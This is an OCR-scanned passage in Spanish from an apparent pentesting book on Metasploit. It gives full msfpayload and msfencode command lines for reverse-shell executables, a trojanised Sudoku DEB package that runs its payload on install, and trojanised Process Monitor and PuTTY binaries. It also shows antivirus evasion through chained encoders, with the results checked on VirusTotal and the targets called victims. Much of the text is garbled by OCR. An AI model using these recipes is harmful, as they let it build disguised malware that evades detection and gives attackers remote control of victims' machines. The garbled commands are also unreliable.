+  --  --»[  217  payloads  -  27  encoders  -  8  Hops 

;LH0ST  *>  192.168,1.39 
I  LPORT  =>  4444 

TAYLOAD  =>  windows/meterpreter/reverse  tep 
•HI  Started  reverse  handler  on  192.16871.39:4444 
l*i  Starting  the  payload  handler... 

’£*1  Sending  stage  (749056  bytes)  to  192.168.1.38 

;[+3  Meterpreter  session  1  opened  (192,168.1.39:4444  ->  192.168.1.38:1057)  at  2012-08-21  15:21:03 
:  -0400 

;C;\ArcMvos  de  programa\Mozilla  Firefox 
jmeierpreter  >  | 


Fig  5.22:  Obtencion  del  control  total  de  una  maquina  victima. 

Para  otros  sistemas  operativos  como  GNU/Unux  u  OSX  tambien  se  pueden  crear  ej  ecu  tables  de^ 
manera  sencilla  e  intuitiva  con  msfpayload.  El  proceso  es  sencillo  se  indiea  un  payload  para  estot 
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sistemas  operativos,  como  por  ejemplo  lmux/x86/shell/reversejcp  u  osx/x86/shell_bindjcp,  y 
automatjcarnente  el  ejecutable  que  se  crea  con  msfpayload  esta  preparado  para  este  tipo  de  sistemas 
operativos. 


root@root:~#  msfpayload  Unux/x86/shell/reverse_tcp  lhost=192. 168. 1.39  lport=4444  X  >  linux, 
Created  by  msfpayload  (http ://www.metasploit. com) . 

Payload :  linux/xB6/shell/ reversetcp 
Length:  50 

Options:  {"lhost,l=>"192. 168. 1.39",  ,,lportu=>"4444B} 

root@root:-#  Is 

Desktop  linux 

raot@root: '#  chmod  +x  linux 

raoiQroot:- tf  ./linux _ _ _ 

Fig  5.23:  Gcnerueion  de  archivo  binario  para  sisLcmas  GNU/Unux. 

En  el  ejemplo  del  binario  para  sistenias  Linux  se  puede  visualizar  como  se  ha  ulilizado  la  misma 
maquina  para  realizar  la  expiotacion,  Como  se  ha  hecho  en  el  resto  de  ejemplos  tendrfa  mayor 
sentido  si  se  realiza  sobre  maquinas  remotas  sobre  las  que  no  se  dispone  de  control. 


payload  =>  Unux/x86/shell/reverse  tcp 
Ihost  =>  192.168.1.39 
Iport  =>  4444 

{*]  Started  reverse  handler  on  192.168.1.39:4444 
hi  Starting  the  payload  handler... 

1*1  Sending  stage  (36  bytes)  to  192.168.1.39 

(*]  Command  shell  session  1  opened  (192.168.1.39:4444  ->  192.168.1.39:52310)  at  2012-08-21  21:49 
: 35  -0400 

Is 

Desktop 

linux 

whoarai 

root  _ 

Fig  5.24:  Oblencion  de  una  shell  inversa  de  un  sislema  operalivo  GNU/Linux. 


PoC:  Creadon  de  un  paquete  DEB  malicioso 

En  esta  prueba  de  conceplo  se  creara  un  fichero  DEB  malicioso.  Hay  que  toner  en  cuenta  que 
se  ejecutara  lanto  la  aplicacion  real  como  el  payload  que  se  inyecle  en  el  paquete,  por  lo  que  la 
aplicacion  real  debe  ser  alguna  que  llame  la  atencion  de  la  vlctima. 

Este  metodo  es  criticado  en  Internet  por  los  mayores  defensores  de  sistenias  operativos  GNU/Linux , 
ya  que  indican  que  el  paquete  no  esta  firmado  ni  verificado  y  que  los  usuarios  no  lo  ejecutanan.  La 
realidad  no  es  asl,  los  usuarios  tambien  descargan  archives  de  Internet  y  ejecutan  cuaiquier  tipo  de 
software  con  oiigenes  desconocidos.  Es  por  esta  razon  que  este  metodo  puede  ftincionar  en  gran 
cantidad  de  casos  ya  que  la  distribucion  del  paquete  es  ciave. 

En  primer  lugar  hay  que  disponer  de  un  paquete  DEB  real  que  albergara  en  su  interior  el  payload. 
Para  obtener  el  archivo  DEB  se  ejecutara  la  siguiente  instruccion  apt-get  -download-only  install 
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<nombre  paquete>.  Para  esta  prueba  de  conceplo  el  paquete  elegido  es  el  juego  del  Sudoku,  el  cual 
es  una  simple  aplicacion  de  Hnea  de  comandos  que  permitira  a  la  vlctima  disponer  de  dichojuego. 

Una  vez  se  ha  obtenido  el  paquete  DEB  se  procede  a  crear  la  estruclura  de  directories  para  el  paquete 
DCB  manipulado  o  malicioso.  Se  ilevaran  a  cabo  las  siguientes  instrucciones’ 

root@root. : -#/ juegoFalso/sudoku#  mv  /var/  cache/  apt/  archives/  sudoku  1  0  1-3 
amdb4.deb  .  - 

rootfi root : - il /juegnFa Iso/sudoku j|  dpkg  -x  sudokuj  .0 .  l-3_amd.64  .deb  makeins,. Ml 
rooteroot :-| /  juegoFeilso/sudokuff  mkdir  makeinstali/DEBIAN 


Una  vez  ereada  ia  estruclura  de  directories  se  deben  crear  los  ficheros  de  control  del  paquete  DEB. 
Esios  ficheros  sc  deben  ubiear  en  el  directorio  DEB1AN.  El  primer  fichero  que  se  debe  crear  tiene 
por  nombre  control. 


Package:  sudokuFa.1  ho 
Version:  0.3 

Section:  Games  and  Amusement 
Priority:  optional 
Architecture:  id86 

Maintainer:  Ubuntu  MOTU  Developers  (ubuntu-motu0iists.ubuntu.com) 
Description:  Un  juego  de  sudoku 


El  fichero  post  ins  t  tambien  debe  ser  creado  en  ei  directorio  DEB)  AN  y  contiene  las  acetones  que  se 
ejecutaian  al  ejecular  el  paquete  DEB.  Para  la  prueba  de  concepto  se  utilizara  el  siguiente  esqueleto. 
Hay  que  tener  en  cuenta  que  una  vez  que  se  crea  este  archivo,  es  recomendabie  asignurle  los  permisos 
755  al  fichero,  ya  que  debe  ser  ejecutado. 

# ! /bin/sh 

chmod  2755  /usr/games/sudokuFaiso  &&  /usr/games/sudokuFaiso’ £ 

Una  vez  que  se  dispone  de  los  archivos  de  control  del  paquete  DEB  creados  y  preparados  se  debe 
crear  el  binario  que  contiene  el  payload.  El  payload  e scogido  para  esta  prueba  dc  concepto  es  linux/ 
x86/ shell/ reverse Jcp. 

Para  crear  el  archivo  binario  se  debe  ejecutar  la  siguiente  instruccibn: 

msfpayload  linux/x86/shell/reversejcp  LHOST-192. 1 68. 1.39  LPORT=4444  X  >  i mot/juegoFalso / 
sudoku/makemstall/usr/games/sudokuFalso. 


Se  puede  observar  que  la  ruta  coincide  con  /usr/games/sudokuFaiso  del  archivo  postinst.  Se  puede 
entender  de  manera  sencilla  que  cuando  la  vlctima  ejecute  el  paquete  DEB  y  el  archivo  postinst  sea 
ejecutado  este  referenda  a  la  ruta  donde  realmente  se  encuentra  el  payload  en  el  interior  del  paquete 
DEB,  provocando  la  ejecucion  del  codigo  malicioso.  Es  altamente  interesante  probar  distintas 
configuraciones  del  archivo  postinst  para  comprobar  su  potencial  y  entender  todo  lo  que  se  puede 
ejecutar  y  fograr  con  un  pensamiento  maligno, 

Por  ultimo  queda  construir  el  paquete  DEB  malicioso,  para  ello  se  utiliza  la  herramienta  dpkg- 
deb.  La  siguiente  instruccion  debe  ser  ejeculada  para  construir  el  paquete  dpkg-deb  -build  /root/ 
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juegoFalso/wdo kv/makeinstall  Tras  visualizar  la  correcta  saiida  de  esta  operativa  sc  recomienda 
cambiar  el  no  mb  re  c!el  paquete  DEB  para  que  pase  desapercibido. 

Antes  de  distribuir  el  paquete  DEB  se  debe  configurar,  por  ejemplo  mediante  la  herramienta  msfcli, 
el  m6dl,Jo  exploit/multi/handler  para  recibir  la  shell  inversa.  Cuando  la  vlctiraa  ejecute  el  paquete 
DEB,  esfara  proporcionando  al  atacante  una shell,  para  gestionar  y  manipular  la  maquina  remota. 

Jpal)toiilp3blo-virtualBox:~$  sudo  dpkg  -1  sudokuFalso. deb 

! Leyendo  la  base  de  dates  ...  127951  flcheros  o  directories  instalados  actualmnte. ) 
i  reparando  para  reenplazar  sudokufalso  Q.3  (usando  sudokuFalso. deb)  . . 

Desenpaquetandc  el  reenplazo  de  sudokufalso  ... 

Conftguramio  sudokufalso  (0.3)  ... 

Frocesando  dlsparadores  para  nan-db  _ 

Fig  5.25:  Ejecucion  del  paquete  DEB  en  una  distribution  Ulmitu. 

i  ras  la  ejecucion  de  una  vfctima  se  recibira  la  sesion  inversa  y  el  control  de  la  maquina  rernnia.  Lo 
mieresante  es  que  !a  vfctima  no  nota  nada  extrafio,  ya  que  sepuede  hacer  que  la  aplicacion  original 
se  ejecute,  por  lo  que  aparentemente  todo  es  correcto. 


-[  metasploit.  v3. 7.0- release  [core: 3. 7  apl:l.e) 

+  '  =[  68-1  exploits  -  355  auxiliary 

1 . “f  217  payloads  -  27  encoders  -  8  nops 

Ihost  =>  192.168.1.39 
Iport  =>  4444 

payload  =>  linux/x86/shell/reverse_tcp 
D1  Started  reverse  handler  on  192.168.1.39:4444 
D]  Starting  the  payload  handler... 

1*1  Sending  stage  (36  bytes)  to.  192.168.1.37 

[*J  Command  shell  session  1  opened  (192.168.1.39:4444  ->  192  188  1  37 -51*397)  at  I 
2012-08-22  19:12:82  -0489  at  j 


jwhoanti 

root 

hostname 

pablo-VirtualBox 

lifeonfiq _ _ 

Fig  5.26:  Obtcncidn  de  una  shell  inversa  en  una  mdqurnii  Ulmitu  a  Iraves  de  un  DEB  maiicioso. 


Payloads  Vs  Antivirus 

Existe  gran  cantidad  de  information  que  trata  la  delicada  relation  entre  los  payload y  los  antivirus. 
La  gi an  mayoria  de  antivirus  detectan  a  gran  cantidad  de  payload  simplcmente  por  la  firm  a  que 
proporciona  la  generation  de  archives  con  este  tipo  de  codigo.  En  la  prueba  tie  concepto  realizada 
anteriormente  se  ha  podido  estudiar  la  creation  de  un  troyano  casero  a  traves  de  la  herramienta 
msfpayload. 

Esta  prueba  de  concepto  Nevada  al  mundo  real  posiblemente  no  darfa  los  resulfados  esperados  ya  que 
algun  antivirus  podrla  detectar  facilmente  la  amenaza.  Como  ejemplo  de  lo  enunciado  anteriormente 
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se  presents  el  sitio  web  hllp://www.vinslolal.com  en  el  que  se  piierle  comptobar  si  el  ejecutable 
creado  anteriormente  es  detectado  y  edemas  que  antivirus  lo  detectan.  Se  puede  „tende  "e  to 
este  USD  a  un  nUo  como  Virus  Total  no  es  el  mas  licito,  pero  hay  que  tener  en  cuertaquet  ntn  rte 
se  aprovecharan  de  este  trpo  de  herramientas  para  conocer  el  grade  de  eficacia  ‘ 
frente  a  los  sistemas  de  proteccion.  ejecutame 


En  la  imagen  se  ha  podido  observar  como  la  gran  mayoria  de  los  sistemas  antivirus  detectan  la 
generaemr.  del  executable  por  detecto.  con  un  payload  Me, erpreler  de  tipo  reverse  ,cp  y  ^ 

Iccnicd  de  evasion  apheada.  En  el  siguiente  aparlado  se  estudiaran  metodos  y  tecnicas  para  la  nosiblt 
evasion  de  la  deteccion  de  los  antivirus.  .  P  P  S  b 


4.  Msfencode:  Evadir  la  deteccion 

Msfencode  es  una  de  esas  herramientas  que  no  llaman  la  atencion  en  comparacion  con  msfpavload 
o  ms/ch.  Pero  al  conocer  de  forma  detailada  las  ftmcionalidades  y  posibilidades  que  aporta  el 
pensamiento  de  mas  de  un  lector  carobiara.  ’ 

Msfencode  es  una  hejTamienta  cuyo  fin  es  evitar  que  los  antivirus  detecten  los  ejecutables  y  payloads 
que  se  han  .do  genemndo  en  los  apartados  anteriores.  El  tin  es  claro,  evadir  el  sistema  de  proteccidn 
ya  que  como  se  ha  v.sto  anteriormente  la  mayoria  de  los  antivirus  detectan  ftcilmente  v  por TZ 

los  ejecutables  anteriores  como  amenazas.  "  P 

Esta  herramienta  dispone  de  ciertos  coneeptos  que  deben  ser  explicados  brevemenle  antes  de  enter 
en  mater, a  como  por  ejemplo  iQue  es  un  encoder  o  codification?  iPor  que  ilerar  una  c^ficZS 
cExisten  a  gontmos  de  codification  mejores  que  otros?  Estas  preguntas  se  iron  relndieXa  „ 
aigo  de  este  aparlado.  Para  las  pruebas  de  concepto  y  para  poder  comprobar  que  la  herramienta  esta 

ejorando  ios  resultados  (rente  a  los  antivirus  se  utilizara,  como  anteriormente  se  ha  utilizado  el 
sitin  web  http://www.virnstotal.com.  utilrzaao,  el 


Codificaeion  con  msfencode 

Una  de  las  mejores  y  mas  seneillas  maneias  de  evitar  ser  deteclado,  o  al  menos  intentarlo,  por  un 
sislema  antivirus  es  utilizar  msfencode  para  codificar  el  payloacl.  En  la  teoria  msfencode  se  encarga 
de  modificar  la  apariencia  del  codigo  del  payload  para  que  el  antivirus  no  jo  detecte.  Al  modificar  l 
apariencia  del  codigo  la  firma  de  esle  cambiara. 

Msfencode  genera  tin  nuevo  ejecutable  o  archivo  binario,  el  cuai  euando  la  victima  lo  ejecute  se 
decodificara  en  memoria  y  se  ejeeutara  el  archivo  real.  La  idea  es  sencilla,  primera  se  codifica  para 
evitar  la  dcteccion  de  Los  antivirus,  para  despues  euando  el  archivo  entre  en  memoria  decodifiear  y 
obtener  el  original  y  las  funcionalidades  de  este. 

Los  codifieadores  o  encoders  disponibles  en  msfencode  se  pueden  obtener  ejeculando  la  siguiente 
ins  truce  ion  msfencode  -/.  Hay  que  tener  en  cuenta  que  cada  arquiteclura  o  piataforma  dispone  de  unos 
codifieadores  expllcitos  para  ella,  es  decir,  tin  encoder  para  una  arquiteclura  x86  no  es  valido  para 
una  arquiteetura  PowerPC.  Adembs,  hay  que  tener  en  cuenta  el  Rank  que  dispone  cada  codificador, 
ya  que  indica  la  valoracibn  que  obtienen  y  el  posible  exito  que  puede  tener  la  codificaeion. 


rootgroot:-#  msfencode  -l 

Framework  Encoders 

Name 

Rank 

Description 

cmd/generic  sh 

good 

Generic  Shell  Variable  Substitution  Command  Encoder 

cmd/ifs 

low 

Generic  ${IF5}  Substitution  Command  Encoder 

cmd/printf  php  mq 

good 

printf(l)  via  PHP  magic  quotes  Utility  Command  Encoder 

generic/none 

normal 

The  “none1*  Encoder 

mipsbe/tongxor 

normal 

XOR  Encoder 

Biipsle/longxor 

normal 

XOR  Encoder 

php/base64 
f  ppc/longxor 

great 

PHP  Base64  encoder 

normal 

PPC  LongXOR  Encoder 

ppc/longxor  tag 

normal 

PPC  LongXOR  Encoder 

sparc/longxor  tag 

normal 

SPARC  DWORD  XOR  Encoder 

x64/xor 

normal 

XOR  Encoder 

x86/alpha  mixed 

low 

Alpha2  Alphanumeric  Mixedcase  Encoder 

x86/alpha  upper 

low 

Alpha2  Alphanumeric  Uppercase  Encoder 

x86/avoid  utf-8  tolower 

manual 

Avoid  UTFB/tolower 

x86/call4  dword  xor 

normal 

Call+4  Dword  XOR  Encoder 

x86/context  epuid 

manual 

CPUID- based  Context  Keyed  Payload  Encoder 

x86/context  stat 

manual 

stat (2 ) -based  Context  Keyed  Payload  Encoder 

x86/context  time 

manual 

time (2) -based  Context  Keyed  Payload  Encoder 

x86/countdown 

normal 

Single- byte  XOR  Countdown  Encoder 

x86/fnstenv_mov 

normal 

Variable -length  Fnstenv/mov  Dword  XOR  Encoder 

Fig  5.28:  Listado  de  codifieadores  disponibles  con  msfencode. 


Para  obtener  ayuda  sobre  el  uso  de  la  herramienta  se  dispone  del  paramelro  -h,  el  cual  proporciona 
informacion  sobre  distintos  usos  y  funcionalidades  de  la  herramienta. 


PoC:  Creacion  de  un  ejecutable  codificado 

En  esta  primera  prueba  de  eoncepto  con  msfencode  se  realizara  una  codificaeion  simple  y  sc 
estudiara  la  mejora  frente-  a  los  antivirus.  El  encoder  escogido  para  esta  prueba  de  eoncepto  es 
x86/shikalajga_nai ,  el  cual  es  un  codificador  polimorfico.  Su  valoracion  es  la  mas  alia  en  el  Rank 
proporcionado  por  la  herramienta. 

En  primerhugar  se  genera  el  ejecutable  tal  y  como  se  harla  normalmente  con  la  herramienta 
msfpayioad  y  mediante  una  tuberla  o  pipe  se  enlaza  con  la  herramienta  msfencode.  Hay  que  tener 
en  cuenta  que  el  modo  de  ejecucion  de  msfpayioad  que  se  utiliza  es  efmotlo  raw,  ya  que  msfencode 
se  encaigara  de  general-  el  ejecutable  euando  reciba  la  salida  de  msfpayioad.  El  para  metro  -  e  indica 
cpie  tipo  de  codificador  se  utilizara,  mientras  que  el  parametro  -t  indica  el  tipo  de  archivo  que  se 
debe  generar. 


rootgroot: ais f payload  windows/ineterpreter/reverse  tep  lhost=192. 168. 1.39  tport=4444  A  I  msfenco 
de  *e  x86/sbikata_ga_nai  -t  exe  >  archivoCodificado.exe 
(*]  x88/ shika t a_ga_nli  succeeded  with  size  317  (iteration^) 

Fig  5.29:  Creaci6n  de  un  ejecutable  codificado  con  msfencode. 

Se  puede  comprobar  que  el  archivo  creado  es  realmente  un  ejecutable  valido  para  sistemas  Windows 
mediante  el  comando//7e.  La  siguiente  instruccion  fde  < arch ivoCo d ifi cado . exe >  devolvera  que  el 
archivo  es  PE32  executable  for  MS  Windows. 


Pot  ultimo  queda  estudiar  los  resultados  que  proporciona  Virus  Total  respecto  a  los  antivirus  del 
metcado  y  el  archivo  codificado  creado.  Para  ello,  se  procede  a  subir  el  archivo  creado  mediante 
msfencode  al  sitio  web  http://www.virusloial.com. 


Fig  5.30:  Obtencion  de  resultados  de  la  codificaeion  simple  en  Virus  Total. 


En  la  imagen  se  puede  visualizar  como  28  de  42  antivirus  hail  detectado  el  ejecutable  como  malicioso. 
Esto  supone  una  mejora  de  5  antivirus  menos,  que  en  la  primera  prueba  que  se  realize  en  la  que  no  se 
utiiizo  la  herramienta  msfencode.  A  continuacion  se  iran  estudiando  distintas  tecnieas  para  intentar 
disminuir  la  deteccion  de  los  archivos  generados. 
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Codificacion  multiple 

Normalmente  las  casas  de  antivirus  estan  continuamente  actualizando  las  bases  de  dates  de  firmas 
para  detectar  el  mayor  numero  de  aplicaciones  maliciosas.  La  codificacion  multiple  permite  a! 
atacante  iterar  sobre  el  payload  y  realizar  varias  codificaciones.  Con  esta  tecnica  se  busca  que  las 
detecciones  estaticas  de  los  antivirus  disminuyan  respecto  a  la  tecnica  de  simple  codificacion. 

LI  encoder  x86/shikaia_ga_nai,  el  cual  es  polimorfico,  permite  generar  distintos payloads  en  cada 
codificacion.  Es  decir,  es  un  puntoa  favor  en  la  generacion  de  firmas  distintas  en  cada  iteracion  del 
encoder. 

La  tecnica  de  multiple  codificacion  permite  utilizar  distintos  encoders  encadenados,  es  decir,  la 
salida  de  uno  sera  la  entrada  del  siguiente.  Es  recomendable  utilizar  un  alto  mimero  de  iteraciones  y 
distintos  encoders  para  intentar  evadir  a  los  antivirus. 


PoC:  Creadon  de  un  executable  multicodificaclo 

En  esta  prueba  de  concepto  se  utilizara  la  tecnica  de  multiple  codificacion  para  estudiar  el  numero 
de  antivirus  que  se  consiguen  evadir.  Los  tipos  de  codificadores  que  se  utilizaran  son  x86/shikata_ 
gajmi,  x86/ context _stat y  x86/countdown.  Estos  codificadores  devolveran  un  ejecutable  el  cual  sera 
deno  m  inado  archivo  MultiCodificado.  exe. 

ont@root : -#  msfpayload  windows/meterpreter/reverse  tep  lhost*192. 168. 1.39  lport=4444  R"[  "nisfenco 
te  -e  xBO/shikata  ga  nai  -c  6  -t  raw  |  msfencode  -e  x86/context  stat  -c  3  -t  raw  |  msfencode  -e  x 
!6/countdown  -e  4  -t  raw  |  msfencode  -e  x86/shikata  ga  nai  -c  6~-t  exe  -o  archivoHultiCodiflcado 
jxb 

1*1  x86/context_stat  succeeded  with  size  62  (iteration=l) 

[♦)  x86/context_stat  succeeded  with  size  124  (iteration=2) 

[*]  x86/context_stat  succeeded  with  size  186  (iteration) 

!*]  x86/coufitdown  succeeded  with  size  283  (iteration^) 

[*]  x86/countrtown  succeeded  with  size  220  Uteration=2) 

*1  xbfi/cmmtdown  succeeded  with  size  237  (iteration**) 

*)  x8fi/countdown  succeeded  with  size  254  (iteration**) 

*1  xfJG/shikata  ga_nai  succeeded  with  size  281  (iteration*!) 
rl  x86/shikata_ga_nai  succeeded  with  size  388  (iteration**) 

*1  xB6/shikata_ga  nai  succeeded  with  size  335  (iteration**) 

*1  xae/shikata  ga  nai  succeeded  with  size  362  (iteration**) 
it*]  x36/shikata_ga_nai  succeeded  with  size  309  (iteration**) 

H  x86/shikata_ga  nai  succeeded  with  size  416  (iteration**) 

Fig  5.3 1 :  Obtenci6n  de  ejecutable  con  la  tecnica  de  codificacion  multiple. 

En  pi  i  met  lugai  se  crea  mediante  msfpayloaa  el  flujo  en  modo  raw  de  un  pavload  windows l 
meterpreter/reversejep.  Este  flujo  se  pasa  a  la  herramienta  msfencode  el  cual  aplicara  el  encoder 
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x86/shikata_ga_nai.  Mediante  la  iitilizacion  del  parametro  -c  se  Iiulica  et  numero  de  iteraciones! 
del  codificador  que  se  deben  real  tzar,  en  el  ejemplo  se  utilizan  6.  Con  el  parametro  -t  se  indicir 
que  la  salida  de  msfencode.  sera  un  fiujo  de  bytes  y  no  un  formato  ejecutable.  La  salida  se  pasa  de< 
nuevo  a  la  herramienta  msfencode  que  en  segunda  instancia  utiliza  el  encoder x86/ context jtat  con  3j 
iteraciones.  La  salida  se  envia  otra  vez  a  msfencode,  en  este  caso  con  el  codificador  x86fcount'do\m 
con  4  iteraciones.  Por  ultimo,  la  salida  se  pasa  de  nuevo  a  msfencode,  para  que  otra  vez  se  utilice^ 
el  encoder  x8 6/s hika(a_ga_nai  con  6  iteraciones.  En  la  t'lltima  ejecucion  de  msfencode  se  utiliza  eta 
parametro  -t  con  exe  para  indicar  que  se  debe  aplicar  salida  en  formato  PE32  executable ,  es  decir 
un  archivo  ejecutable  final  para  un  sistema  Windows. 

A  continiiacibn,  hay  que  estudiar  si  el  numero  de  antivirus  que  detectan  el  archivo  ha  mejorado  o  no. 
Sc  piocede  a  subir  el  archivo  a  Virus  Total  y  comprobar  el  numero  de  antivirus  que  lo  detectan  y  sii 
se  ban  mejorado  los  resultados  anteriores.  En  este  caso,  no  se  ha  obtenido  mejora,  ya  que  se  obtiene 
practicamente  el  mismo  resultado. 


En  esta  tecnica  entra  en  jtiego  la  utilization  de  unos  encoders  u  otros  y  la  combination  de  estos.  Es 
allamente  recomenaablc  utilizar  distintas  combinaciones,  con  distintas  iteraciones  e  ir  comprobartdo 
los  resultados  en  Virus  Total. 


Teoria  sobre  ejecutables  personalizados  y  sigilosos 

Esta  tecnica  va  un  paso  adeiante  y  se  basa  en  las  plantillas  para  crear  los  ejecutables.  Por  defecto. 
Metasploit  almacena  en  la  ruta  /pentest/ exploits/ framework3/data/templales  las  plantillas  o 
esquelelos  para  la  creaci6n  de  ejecutables,  DLLs  o  binarios  de  sistemas  basados  en  Unix. 

La  tecnica  que  se  estudiara  aliora  permite  al  atacante  utilizar  plantillas  personal izadas,  con  el 
objetivo  de  evadir  las  firmas  de  las  plantillas  por  defecto,  las  cuales  normalmente  estan  registradas 
por  los  antivirus.  Lb  que  realmente  se  busca  es  utilizar  un  ejecutable  cuaiquier,  por  ejemplo  valrdo 
en  sislemas  Windows  para  que  los  antivirus  no  lo  detecten  como  amenaza.  Ademas,  se  codificaM 
mediante  el  uso  de  algun  encoder  para  intentar  mejorar  la  posible  evasion. 
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Para  pocler  utilizer  dicha  tecnica  se  dispone  del  parametro  --x  en  msfencode.  A  este  parametro  se  le 
debe  indicar  que  ejecutable  se  quiere  usar  para  llevar  a  cabo  la  creacion  del  element©  malicioso  que 
contendra  el  payload  codificado.  Por  otro  lado,  y  como  una  evolucion  de  la  tecnica  de  las  plantillas 
personal izadas,  se  dispone  de  la  tecnica  de  los  ejecutabies  sigilosos.  Esta  tecnica  permite  lanzar  un 
thread  que  sera  el  que  ejecute  realmente  el  payload,  mientras  que  el  proceso  principal  sera  la  propia 
apiicacion  real  o  como  se  ha  mencionado  anteriormente  la  plantilla  persona  I  izada. 

Esta  tecnica  dispone  de  algunos  inconvenienles  ya  que  no  funciona  con  todos  los  ejeculables  y 
se  debe  preparar  y  realizar  un  estudio  previo  antes  de  ejecutar  el  archive  malicioso  contra  una 
posibie  victima.  Para  poder  utilizar  dicha  tecnica  se  dispone  del  parametro  -k  en  msfencode.  Es 
un  parametro  de  tipo  switch,  es  decir  simplemente  indicando  -k,  msfencode  conoce  la  accion  que 
debe  realizar.  Se  podra  visualizar  un  ejemplo  sencillo  y  ciaro  en  el  apartado  de  las  pruebas  de 
concepto  que  iniplementan  dichas  tecnicas.  La  tecnica  sigilosa  debe  ser  puesta  en  prtieba  siempre 
con  aplicaciones  que  dispongan  de  interfaz  grafica  para  que  la  victima  no  sospeche  de  una  ejecucion 
extrana  en  su  inaquina. 


PoC:  Creacion  de  un  ejecutable  personalizado 

En  la  siguiente  prueba  de  concepto  se  utilizara  un  ejecutable  de  Windows ,  el  cual  se  utilizara  como 
plantilla.  La  herramienta  escogida  para  tal  fin  es  la  apiicacion  Process  Monitor  de  Sysinternals ,  la 
cual  puede  ser  descargada  desde  la  siguiente  URL  http://lechnet.inicrosoJi.com/es-es/sysinternals/ 
bh896645.aspx .  El  archivo  que  se  generara  se  denominara  procmonCodijkado.exe.  En  un  sistema 
Windows  se  visualizara  con  el  mismo  icono  y  con  la  misma  information  que  el  archivo  original. 


Fig  5.33:  Icono  e  infoimacion  sobre  el  ejecutable  malicioso. 


Para  llevar  a  cabo  este  proceso.  de  nuevo  se  utilizan  conjuntamenle  las  herramientas  msfpayload 
y  msfencode.  La  salida  de  msfencode  con  payload  windows/meterpreter/reversejep  se  pasa  a  la 
herramienta  msfencode  que  utiliza  el  encoder x86/shikata  ga  nai  con  5  itcraciones.  con  el  parametro 
-x  se  especifica  la  ruta  donde  esta  el  ejecutable  real  de  Process  Monitor.  Por  ultimo,  se  indica  que 
tipo  de  archivo  se  esta  generando  y  la  ruta  donde  se  albergara.el  nuevo  archivo  ejecutable  malicioso. 


root@root:~#  msfpayload  windows/meterpreter/reverse_tcp  lhost=192.168.1.3S  lport=4444  R  1  msfenco 
de  -e  x86/shikata_ga_nai  -x  $HGME/ Procmon.exe  -t  exe  -c  5  *o  procmonCodificado.exe 
[*]  x86/shikata_ga_nai  succeeded  with  size  317  (iteration^) 

[*]  x86/shikata_ga_nai  succeeded  with  size  344  (iteration**) 

[*}  x86/shikata_ga_nai  succeeded  with  size  371  (iteration*.!) 

[*]  x96/shikata_ga_nai  succeeded  with  size  398  (iterations) 

[*]  x86/shikata_ga_nai  succeeded  with  size  425  (iterations) _ _ _ _ 

Fig  5.34:  Creacion  de  ejecutable  medianle  et  uso  de  la  tecnica  de  plantilla  persona lizada. 
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Una  vez  creado  el  ejecutable  y  como  en  las  pruebas  anteriores  se  procede  a  subir  el  archivo  a 
Virus  Total  y  comprobar  cuantos  motores  antivirus  detectan  el  ejecutable.  El  objetivo  es  conseguir 
disminuir  el  numero  de  antivirus  que  detecten  el  archivo  como  malicioso. 


Fig  5.35:  Obtencion  de  resullados  del  ejecutable  con  plantilla  en  Virus  Total. 

Como  se  puede  visualizar  en  los  resullados,  se  ha  conseguido  mejorar  la  cifra  de  antivirus  que  no 
detectan  el  archivo  como  malicioso.  Y  se  ha  disminuido  consklerabiemente  la  cifra  respcclo  a  la 
primera  prueba  que  se  realizo  en  la  que  no  se  utilizaba  ningun  encoder.  Respecto  a  aquelia  primera 
prueba  se  ha  conseguido  evadir  10  antivirus.  Habrta  que  seguir  realizando  ensayos  y  combinaciones 
para  intentar  conseguir  rebajar  las  cifras.  En  este  caso  la  paciencia  es  un  factor  fundamental  asi  como 
disponer  de  herramientas  en  Internet  como  Virus  Total  para  ir  probando  las  distinlas  configuraciones. 


FoC:  Creacion  de  un  ejecutable  personalizado  y  sigiloso 

En  esta  prueba  de  concepto  se  utilizara  una  plantilla  persoiiaiizada,  la  cual  ejecutara  un  thread  donde 
realmente  se  ejecutara  el  payload.  La  herramienta  que  se  utilizara  dispone  de  interfaz  grafica  para 
evitar  que  la  victima  sospeche  que  algo  exlrano  ocurre  en  su  equipo.  La  idea  es  que  la  apiicacion 
real  se  ejecute  en  primer  piano,  mientras  que  un  thread  ejecute  el  payload  en  la  maquina  victima. 

Al  crear  el  ejecutable,  este  dispondra  del  icono  original  de  la  herramienta  Putty,  la  cual  se  utilizara 
como  plantilla  en  este  caso.  Ademas,  se  muestra  la  version  e  informacion  real  de  dicha  apiicacion. 


Fig  5.36:  Informacibn  del  ejecutable  malicioso. 


Para  crear  dicho  ejecutable  se  utilizaran  de  nuevo  las  herramientas  msfpayload y  msfencode  enlazadas 
otra  vez  por  un  pipe.  Msfpayload  de  nuevo  utilizara  el  payload  windows/meterpreler/reverse_lcp, 


Metasploit  para  Pen  testers 


mientras  que  msf encode  utilizara  el  encoder  x86/shikata  jgajiai  con  5  iteraciones.  Como  novedad 
hay  que  Hj arse  que  se  aplica  el  parametro  -k  para  indicar  que  el  payload  debe  ser  invocado  en  un 
thread  en  el  main.  De  este  modo  se  consigue  que  en  primer  piano  se  ejecute  la  apiicacion  gralica, 
mientras  que  en  segundo' piano  se  ejecuta  el  payload.  Esto  ayuda  y  mucho  a  que  la  vlctima  sienta  que 
no  hay  nada  extrano  en  la  ejecucion  de  la  apiicacion.  Normalmente,  dicha  apiicacion  se  cerrara  a  los 
pocos  segundos,  pero  se  ha  conseguido  que  la  vlctima  vea  todo  de  manera  normal. 


rootgruot:-#  msfpayload  windows/meterpreter/reversetcp  lhost=192.1G8.I.39  lport=4444  R  j  msfenco 
ile  -t  exe  -x  /root/putty. exe  -e  x86/shikata_ga_nai  -k  -c  5  -o  puttyCodificado.exe 
M]  x86/shikata_ga_nai  succeeded  with  size  317  (iteration*!) 

1*3  x86/shikata_ga_nai  succeeded  with  size  344  (iteration=2) 

(*]  x86/shikata_ga_nai  succeeded  with  size  371  (iteration^) 

[*]  x86/shikata_ga_nai  succeeded  with  size  398  (iteration^) 

[*]  x86/shikata_ga_nai  succeeded  with  size  425  (iterations) 

Fig  5.37:  Creacion  del  ejecutable  coil  planlilla  personaiizaclti  y  sigiloso. 

Tras  crear  el  archivo  y  codificarlo  se  distribuye  sobre  las  vlctimas.  Cuando  estas  lo  ejecuten 
podran  visualizar  correctamente  la  apiicacion  Putty  funcionando,  o  aparentemente  ejecutandose 
correctamente.  En  la  itnagen  se  puede  visualizar  como  al  ejecutar  el  archivo  se  obtiene  la  pantalfa 
principal  de  dicha  .apiicacion. 
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Fig  5.38:  Ejecucion  de puttyCodificado  con  apariencia  real. 
